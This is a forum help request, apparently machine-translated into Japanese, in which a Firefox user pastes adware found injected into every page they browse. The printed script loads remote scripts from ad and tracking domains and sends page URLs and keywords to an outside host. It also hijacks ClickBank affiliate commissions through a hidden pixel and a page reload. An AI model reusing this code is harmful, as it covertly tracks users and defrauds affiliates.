1

最新バージョンの Firefox を実行しています。私のOSはMac 10.7.5です。私は Cookie マネージャーを使用しており、最近まで NoScript を使用していました。最近、NoScript を無効にしました。

私の Yahoo メール アカウントの 1 つにログインすると、どう見ても正規のように見える異常なポップアップ ウィンドウが表示されました。それは、私がマーケティングの設定を更新していないこと、更新しないとアカウントが停止されることを意味するものでした。「終了」部分はすぐに怪しいように見えましたが、ウィンドウ (画面の下部にポップアップ) が邪魔だったので、「X」をクリックして閉じようとしました。別のウィンドウが開きましたが、すぐに閉じました。

その直後、私は Firefox にさまざまな変更が加えられていることに気付きました。最終的に、LittleSnitch から shopping-guide-onlines.com と superfish.com への発信接続をすべてブロックしました。しかし、彼らはまだいくつかの邪悪な魔法を働いています.

WebDeveloper アドオンを使用して GENERATED ソース コードを表示すると、ナビゲートするすべてのページに次のように表示されます (個人情報は消しました)。

<script>var scr = document.createElement( "script" );
scr.type= 'text/javascript';
scr.setAttribute( "src", "http://spns.rotatemyad.com/scripts/c07da12841ed3554e8f1a548ab1e3a57ce18a908.js" );
scr.setAttribute('async', 'true');
document.getElementsByTagName('head')[0].appendChild( scr );
var scr = document.createElement( "script" );
scr.type= 'text/javascript';
if (window.location.protocol.indexOf( "https" ) > -1) {
scr.setAttribute( "src", "https://www.superfish.com/ws/sf_main.jsp?dlsource=hljijvz&userId=&CTID=mp");
} else {
scr.setAttribute( "src", "http://www.superfish.com/ws/sf_main.jsp?dlsource=hljijvz&userId=&CTID=mp");
}
scr.setAttribute('async', 'true');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild( scr );

if( document.location.href.search("•••••.com") > -1 ||
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 || 
    document.location.href.search("•••••.com") > -1 ) {

    var scr = document.createElement( "script" );
    scr.type= 'text/javascript';
    scr.setAttribute( "src", "http://shopping-guide-online.com/c2.php" );
    document.getElementsByTagName('head')[0].appendChild( scr );
}

if( document.location.href.search("clickbank.net/order/orderform") > -1 ) {
    var aff1 = "kwrdstool";
    var body = document.getElementsByTagName('body')[0];
    var aff2 = body.innerHTML.match(/\[affiliate = (.*?)\]/i);
    if( aff2.hasOwnProperty("1") && aff2[1] != "" ) {
        if( aff1 != aff2[1] ) {
            var head = document.getElementsByTagName('head')[0].innerHTML;
            var vend = head.match(/<!-- vs: (.*?) -->/i);
            if( vend.hasOwnProperty("1") && vend[1] != "" ) {
                body.style.display = "none";
                var f = document.createElement('img');
                f.style.width   = '1px';
                f.style.height = '1px';
                f.style.position = 'absolute';
                f.style.top = '-999px';
                f.src = "http://" + aff1 + "." + vend[1] + ".hop.clickbank.net";
                setTimeout( function() { window.location.href = window.location.href; }, 2000 );
                body.appendChild(f);
            }
        }
    }
} 

function get_mk()
{
    metaCollection = document.getElementsByTagName("meta");
    for (i = 0; i < metaCollection.length; i++) {
        if (metaCollection[i].name.search(/keywords/i) != -1)
        {
            return metaCollection[i].content
        }
    }
    return ""
}

function add_a(a)
{
    var b       = document.getElementsByTagName('body')[0];
    var f       = document.createElement('iframe');
    f.id        ='ifr1';
    f.style.width   ='1px';
    f.style.height  ='1px';
    f.style.position= 'absolute';
    f.style.top     ='-999px';
    f.src       = a;

    b.appendChild(f);
}

function add_script(a)
{
    var b       = document.getElementsByTagName('head')[0];
    var f       = document.createElement('script');
    f.id        ='scr1';
    f.src       = a;

    b.appendChild(f);
}




function contains(a, e){ for(j=0;j<a.length;j++)if(a[j]==e)return true; return false;}
function setCookie(c_name,value,exdays){ var exdate=new Date(); exdate.setDate(exdate.getDate() + exdays); var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString()); document.cookie=c_name + "=" + c_value; }

function getCookie(c_name)
{var i,x,y,ARRcookies=document.cookie.split(";");for(i=0;i<ARRcookies.length;i++)
{x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);x=x.replace(/^\s+|\s+$/g,"");if(x==c_name)
{return unescape(y);}}}


shuffle = function(o){ //v1.0
    for(var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);
    return o;
};


function get_timestamp(){   return Math.round((new Date()).getTime() / 1000);}
function trim (myString){   return myString.replace(/^\s+/g,'').replace(/\s+$/g,'')}


var cur_loc=escape(window.location);
if( cur_loc.length<500 )
{
var scr = document.createElement( "script" );
scr.type= 'text/javascript';get_mk
scr.setAttribute( "src", "http://shopping-guide-onlines.com/search/adi/g.php?k=" + encodeURIComponent(get_mk().substring(0, 200)) + "&r=" + encodeURIComponent(window.location));      
scr.setAttribute('async', 'true');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild( scr );
}var added_order=false; if(document.getElementById( "fbevid1" )!=undefined)
    {
        if(document.getElementById( "fbevid2" )!=undefined)
        {
            document.getElementById( "fbevid1" ).style.display="none";
            document.getElementById( "fbevid2" ).style.display="";
        }
    }</script><script async="true" src="http://spns.rotatemyad.com/scripts/c07da12841ed3554e8f1a548ab1e3a57ce18a908.js" type="text/javascript"></script><script async="true" src="http://www.superfish.com/ws/sf_main.jsp?dlsource=hljijvz&amp;userId=&amp;CTID=mp" type="text/javascript"></script><script async="true" src="http://shopping-guide-onlines.com/search/adi/g.php?k=&amp;r=http%3A%2F%2F••••••••.html" type="text/javascript"></script>

これに対する修正を提供する出版物は見つかりませんでした。キャッシュをクリアしても何も起こりませんでした。私が理解しているように、ショッピングガイドオンライン、スーパーフィッシュ、ローテーションミアドを使用する大企業がたくさんあります. もしそうなら、彼らはすべて詐欺師です。

4

0 に答える 0